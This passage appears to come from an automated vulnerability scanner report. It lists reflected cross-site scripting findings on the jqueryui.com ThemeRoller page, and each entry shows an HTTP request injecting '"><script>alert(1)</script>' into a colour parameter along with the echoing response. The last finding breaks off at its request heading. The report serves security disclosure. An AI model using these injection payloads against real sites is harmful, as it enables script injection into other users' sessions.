GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a73316"><script>alert(1)</script>6045c0d1b5&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120127

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a73316"><script>alert(1)</script>6045c0d1b5&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55
...[SNIP]...

3.137. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15638"><script>alert(1)</script>d1337495d25 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f715638"><script>alert(1)</script>d1337495d25&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ld&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f715638"><script>alert(1)</script>d1337495d25&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefau
...[SNIP]...

3.138. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51bf5"><script>alert(1)</script>5b6241fd956 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d851bf5"><script>alert(1)</script>5b6241fd956&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d851bf5"><script>alert(1)</script>5b6241fd956&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&b
...[SNIP]...

3.139. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a5c"><script>alert(1)</script>aafa9f7e456 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec83a5c"><script>alert(1)</script>aafa9f7e456&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
63636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec83a5c"><script>alert(1)</script>aafa9f7e456&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

3.140. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71047"><script>alert(1)</script>322de3bc4ee was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E671047"><script>alert(1)</script>322de3bc4ee&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E671047"><script>alert(1)</script>322de3bc4ee&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent
...[SNIP]...

3.141. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0cc"><script>alert(1)</script>05af9fa5873 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88fe0cc"><script>alert(1)</script>05af9fa5873&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88fe0cc"><script>alert(1)</script>05af9fa5873&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&bo
...[SNIP]...

3.142. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4cf7"><script>alert(1)</script>bd812dcb8db was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1dfc4cf7"><script>alert(1)</script>bd812dcb8db&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1dfc4cf7"><script>alert(1)</script>bd812dcb8db&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderC
...[SNIP]...

3.143. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0062"><script>alert(1)</script>44c898d98f6 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaac0062"><script>alert(1)</script>44c898d98f6&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
d42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaac0062"><script>alert(1)</script>44c898d98f6&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

3.144. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99072"><script>alert(1)</script>6e4b3546877 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa99072"><script>alert(1)</script>6e4b3546877&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa99072"><script>alert(1)</script>6e4b3546877&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.145. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e233d"><script>alert(1)</script>dfa3cab4bb9 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

